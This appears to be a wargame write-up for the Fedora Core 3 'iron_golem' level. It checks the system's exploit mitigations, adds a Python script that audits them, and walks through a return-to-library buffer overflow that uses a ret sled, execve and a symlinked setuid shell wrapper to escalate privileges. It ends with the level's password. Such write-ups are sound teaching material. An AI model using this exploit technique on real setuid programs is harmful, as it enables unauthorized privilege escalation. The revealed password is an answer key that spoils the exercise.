Since this is the first problem, I'll start with an analysis of the environment.
Fedora Core 3 environment analysis
Stack Dummy : O
[gate@Fedora_1stFloor ~]$ gcc -v
Reading specs from /usr/lib/gcc/i386-redhat-linux/3.4.2/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-java-awt=gtk --host=i386-redhat-linux
Thread model: posix
gcc version 3.4.2 20041017 (Red Hat 3.4.2-6.fc3) // gcc 2.96 and later insert a stack dummy
[gate@Fedora_1stFloor ~]$ gdb -q iron_golem
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x080483d0 <main+0>: push ebp
0x080483d1 <main+1>: mov ebp,esp
0x080483d3 <main+3>: sub esp,0x108
0x080483d9 <main+9>: and esp,0xfffffff0
0x080483dc <main+12>: mov eax,0x0
0x080483e1 <main+17>: add eax,0xf
0x080483e4 <main+20>: add eax,0xf
0x080483e7 <main+23>: shr eax,0x4
0x080483ea <main+26>: shl eax,0x4
0x080483ed <main+29>: sub esp,eax // this is where the stack dummy is formed
0x080483ef <main+31>: cmp DWORD PTR [ebp+8],0x1
0x080483f3 <main+35>: jg 0x804840f <main+63>
0x080483f5 <main+37>: sub esp,0xc
0x080483f8 <main+40>: push 0x8048524
0x080483fd <main+45>: call 0x80482f8 <_init+56>
0x08048402 <main+50>: add esp,0x10
0x08048405 <main+53>: sub esp,0xc
0x08048408 <main+56>: push 0x0
0x0804840a <main+58>: call 0x8048308 <_init+72>
0x0804840f <main+63>: sub esp,0x8
0x08048412 <main+66>: mov eax,DWORD PTR [ebp+12]
0x08048415 <main+69>: add eax,0x4
0x08048418 <main+72>: push DWORD PTR [eax]
0x0804841a <main+74>: lea eax,[ebp-264]
0x08048420 <main+80>: push eax
0x08048421 <main+81>: call 0x8048318 <_init+88>
0x08048426 <main+86>: add esp,0x10
0x08048429 <main+89>: sub esp,0x8
0x0804842c <main+92>: lea eax,[ebp-264]
0x08048432 <main+98>: push eax
0x08048433 <main+99>: push 0x8048530
0x08048438 <main+104>: call 0x80482f8 <_init+56>
0x0804843d <main+109>: add esp,0x10
0x08048440 <main+112>: leave
0x08048441 <main+113>: ret
0x08048442 <main+114>: nop
0x08048443 <main+115>: nop
End of assembler dump.
Bash drops privileges : O
Random Stack : O
[gate@Fedora_1stFloor ~]$ cat /proc/sys/kernel/exec-shield-randomize
1
[gate@Fedora_1stFloor ~]$ cat > ASLR_test.c
#include <stdio.h>
unsigned long getEBP(void){
    unsigned long ebp;
    asm("movl %%ebp,%0" : "=r"(ebp)); /* read this function's frame pointer */
    return ebp;
}
int main(void){
    printf("EBP:%lx\n",getEBP()); /* changes between runs when the stack is randomized */
    return 0;
}
[gate@Fedora_1stFloor ~]$ gcc -o ASLR_test ASLR_test.c
[gate@Fedora_1stFloor ~]$ ./ASLR_test
EBP:fef3d600
[gate@Fedora_1stFloor ~]$ ./ASLR_test
EBP:fee85660
[gate@Fedora_1stFloor ~]$ ./ASLR_test
EBP:fef699b0
[gate@Fedora_1stFloor ~]$ ./ASLR_test
EBP:fee30e40
[gate@Fedora_1stFloor ~]$ ./ASLR_test
EBP:fee43770
Random Library : X
[gate@Fedora_1stFloor ~]$ cat /proc/self/maps | grep -e libc
0071c000-0083d000 r-xp 00000000 fd:00 68708 /lib/tls/libc-2.3.3.so
0083d000-0083f000 r--p 00120000 fd:00 68708 /lib/tls/libc-2.3.3.so
0083f000-00841000 rw-p 00122000 fd:00 68708 /lib/tls/libc-2.3.3.so
[gate@Fedora_1stFloor ~]$ cat /proc/self/maps | grep -e libc
0071c000-0083d000 r-xp 00000000 fd:00 68708 /lib/tls/libc-2.3.3.so
0083d000-0083f000 r--p 00120000 fd:00 68708 /lib/tls/libc-2.3.3.so
0083f000-00841000 rw-p 00122000 fd:00 68708 /lib/tls/libc-2.3.3.so
[gate@Fedora_1stFloor ~]$ cat /proc/self/maps | grep -e libc
0071c000-0083d000 r-xp 00000000 fd:00 68708 /lib/tls/libc-2.3.3.so
0083d000-0083f000 r--p 00120000 fd:00 68708 /lib/tls/libc-2.3.3.so
0083f000-00841000 rw-p 00122000 fd:00 68708 /lib/tls/libc-2.3.3.so // the library address does not change.
Random Program Binary Mapped : X
ASCII Armor : O
[gate@Fedora_1stFloor ~]$ cat /proc/self/maps
00703000-00718000 r-xp 00000000 fd:00 68707 /lib/ld-2.3.3.so // the top byte of the address is NULL
00718000-00719000 r--p 00014000 fd:00 68707 /lib/ld-2.3.3.so
00719000-0071a000 rw-p 00015000 fd:00 68707 /lib/ld-2.3.3.so
0071c000-0083d000 r-xp 00000000 fd:00 68708 /lib/tls/libc-2.3.3.so
0083d000-0083f000 r--p 00120000 fd:00 68708 /lib/tls/libc-2.3.3.so
0083f000-00841000 rw-p 00122000 fd:00 68708 /lib/tls/libc-2.3.3.so
00841000-00843000 rw-p 00841000 00:00 0
08048000-0804c000 r-xp 00000000 fd:00 228524 /bin/cat
0804c000-0804d000 rw-p 00003000 fd:00 228524 /bin/cat
08863000-08884000 rw-p 08863000 00:00 0
f6df8000-f6ff8000 r--p 00000000 fd:00 558549 /usr/lib/locale/locale-archive
f6ff8000-f6ff9000 rw-p f6ff8000 00:00 0
fef52000-ff000000 rw-p fef52000 00:00 0
ffffe000-fffff000 ---p 00000000 00:00 0
Non-Executable Stack : O
[gate@Fedora_1stFloor ~]$ cat /proc/sys/kernel/exec-shield
1
[gate@Fedora_1stFloor ~]$ readelf -l iron_golem
Elf file type is EXEC (Executable file)
Entry point 0x8048328
There are 7 program headers, starting at offset 52
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
PHDR 0x000034 0x08048034 0x08048034 0x000e0 0x000e0 R E 0x4
INTERP 0x000114 0x08048114 0x08048114 0x00013 0x00013 R 0x1
[Requesting program interpreter: /lib/ld-linux.so.2]
LOAD 0x000000 0x08048000 0x08048000 0x00538 0x00538 R E 0x1000
LOAD 0x000538 0x08049538 0x08049538 0x00108 0x0010c RW 0x1000
DYNAMIC 0x00054c 0x0804954c 0x0804954c 0x000c8 0x000c8 RW 0x4
NOTE 0x000128 0x08048128 0x08048128 0x00020 0x00020 R 0x4
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4 // no E (execute) flag
Section to Segment mapping:
Segment Sections...
00
01 .interp
02 .interp .note.ABI-tag .hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame
03 .ctors .dtors .jcr .dynamic .got .got.plt .data .bss
04 .dynamic
05 .note.ABI-tag
06
Non-Executable Heap : O
[gate@Fedora_1stFloor ~]$ readelf -l iron_golem
(same output as the readelf -l dump above; only the relevant line is repeated)
DYNAMIC 0x00054c 0x0804954c 0x0804954c 0x000c8 0x000c8 RW 0x4 // no execute permission
Stack Canary : X
[gate@Fedora_1stFloor ~]$ gdb -q iron_golem
(gdb) disas main
(same output as the disas main dump above; only the end is repeated)
0x08048441 <main+113>: ret // no canary is visible.
End of assembler dump.
Stack Smashing Protector : X
[gate@Fedora_1stFloor ~]$ gdb -q iron_golem
(gdb) disas main
(same output as the disas main dump above; only the end is repeated)
0x08048441 <main+113>: ret // __stack_chk_fail is not visible
End of assembler dump.
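As an added example that is not part of the original writeup, the O/X checks above can be scripted: the Python below parses saved readelf -l, /proc/self/maps and gdb disas output (the samples are constructed from the output shown in this post) and reports NX stack, library randomization, ASCII armor and canary presence, so the same audit can be rerun on another box without reading the dumps by hand.

```python
# Constructed samples, copied from the readelf, /proc/self/maps and gdb output shown above.
READELF_L = """\
  LOAD      0x000000 0x08048000 0x08048000 0x00538 0x00538 R E 0x1000
  LOAD      0x000538 0x08049538 0x08049538 0x00108 0x0010c RW  0x1000
  GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4
"""
MAPS_RUN_1 = "0071c000-0083d000 r-xp 00000000 fd:00 68708 /lib/tls/libc-2.3.3.so\n"
MAPS_RUN_2 = "0071c000-0083d000 r-xp 00000000 fd:00 68708 /lib/tls/libc-2.3.3.so\n"
DISAS_MAIN = "0x080483d0 <main+0>: push ebp\n0x08048441 <main+113>: ret\n"

def segment_flags(readelf_l, ptype):
    """Flg column of the first program header of type ptype, e.g. 'RW' or 'RE'."""
    for line in readelf_l.splitlines():
        parts = line.split()  # Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg... Align
        if len(parts) >= 8 and parts[0] == ptype:
            return "".join(parts[6:-1])
    return None

def stack_is_nx(readelf_l):
    """GNU_STACK without E: the kernel maps the stack without execute permission."""
    flags = segment_flags(readelf_l, "GNU_STACK")
    return flags is not None and "E" not in flags

def text_base(maps, lib="libc"):
    """Start address of the first executable (r-xp) mapping of lib in a maps dump."""
    for line in maps.splitlines():
        parts = line.split()  # start-end perms offset dev inode path
        if len(parts) >= 6 and parts[1] == "r-xp" and lib in parts[5]:
            return int(parts[0].split("-")[0], 16)
    return None

def library_randomized(maps_a, maps_b, lib="libc"):
    """Same libc base in two separate runs means the library is not randomized."""
    return text_base(maps_a, lib) != text_base(maps_b, lib)

def ascii_armored(addr):
    """The post's ASCII armor criterion: the top byte of the address is 0x00."""
    return (addr >> 24) == 0

def canary_present(disas):
    """i386 glibc canary: a load from gs:0x14 in the prologue or a __stack_chk_fail call."""
    return "gs:0x14" in disas or "__stack_chk_fail" in disas

def audit(readelf_l, maps_a, maps_b, disas):
    """Reproduce part of the O/X checklist above as a dict of booleans."""
    base = text_base(maps_a)
    return {"Non-Executable Stack": stack_is_nx(readelf_l),
            "Random Library": library_randomized(maps_a, maps_b),
            "ASCII Armor": base is not None and ascii_armored(base),
            "Stack Canary": canary_present(disas)}
```

Feed audit() the real output of the three commands on the host being checked; on the FC3 box above it yields NX stack O, random library X, ASCII armor O, canary X.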
For this Fedora LOB I'll avoid brute-force attacks as much as possible.
Since the stack is NX, the environment-variable attack can't be used, and the other stack-based attacks don't work either.
So I wanted to use an RTL attack, but because of ASCII armor the argument has to come from a garbage value that is already sitting on the stack, used by way of a symbolic link.
[gate@Fedora_1stFloor ~]$ cp iron_golem iron_gole1
[gate@Fedora_1stFloor ~]$ gdb -q iron_gole1
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x80483d9
(gdb) r
Starting program: /home/gate/iron_gole1
(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x080483d9 in main ()
(gdb) x/40x $ebp
0xfeed0e48: 0xfeed0ea8 0x00730e33 0x00000001 0xfeed0ed4
0xfeed0e58: 0xfeed0edc 0x0070eab6 0x0083eff4 0x00000000 // use one of the two fixed addresses outside the stack as the argument; the shorter one is better.
0xfeed0e68: 0xfeed0e60 0xfeed0ea8 0xfeed0e50 0x00730df5
0xfeed0e78: 0x00000000 0x00000000 0x00000000 0x00718fb4
0xfeed0e88: 0x00000001 0x08048328 0x00000000 0x0070e9f0
0xfeed0e98: 0x0070f340 0x00718fb4 0x00000001 0x08048328
0xfeed0ea8: 0x00000000 0x08048349 0x080483d0 0x00000001
0xfeed0eb8: 0xfeed0ed4 0x08048444 0x08048498 0x0070f340
0xfeed0ec8: 0xfeed0ecc 0x00715e31 0x00000001 0xfef68c20
0xfeed0ed8: 0x00000000 0xfef68c36 0xfef68c4f 0xfef68c5f
(gdb) x/s 0x0070eab6
0x70eab6 <fixup+150>: "\213Uð\203ì\024\211Á1À\205Òt\v\205ÉtL\213B\004\2131\001ð\213»øüÿÿ\205ÿu\005\213Mä\211\001\215eô[^_]Ã\213Mè\213@\004\017·\004H\213\216\210\001"
(gdb) x/s 0x0083eff4 // shorter.
0x83eff4 <svcauthsw+712>: "<í\203"
(gdb) x/x 0x0083eff4
0x83eff4 <svcauthsw+712>: 0x0083ed3c
(gdb) quit
The program is running. Exit anyway? (y or n) y
[gate@Fedora_1stFloor ~]$ cat > sh.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main()
{
setreuid(geteuid(),geteuid()); /* keep the effective uid/gid we were started with */
setregid(getegid(),getegid());
system("/bin/sh");
return 0;
}
[gate@Fedora_1stFloor ~]$ gcc -o sh sh.c
[gate@Fedora_1stFloor ~]$ ln -s sh `perl -e 'print "\x3c\xed\x83"'`
[gate@Fedora_1stFloor ~]$ export PATH=./:$PATH // prepend the current directory to PATH.
##### writing the payload ###########
* checking the dummy
[gate@Fedora_1stFloor ~]$ gdb -q iron_golem
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b *main+31
Breakpoint 1 at 0x80483ef
(gdb) r
Starting program: /home/gate/iron_golem
(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x080483ef in main ()
(gdb) set $x=$ebp-$esp
(gdb) print $x
$1 = 280
But since the buffer was allocated 264 bytes at the start, the dummy is 16 bytes.
['a' * 268][&ret * 3][execve] --> The reason for not using system():
system() has a step in its internal routine that resets the effective uid via geteuid, so the privilege can't be kept. Therefore the address of execve has to be found instead of the address of system.
#########################
[gate@Fedora_1stFloor ~]$ ./iron_golem `perl -e 'print "a"x268,"\x41\x84\x04\x08"x3,"\x90\x54\x7a\x00"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAATz
sh-3.00$ id
uid=501(iron_golem) gid=501(iron_golem) groups=500(gate) context=user_u:system_r:unconfined_t
sh-3.00$ my-pass
euid = 501
blood on the fedora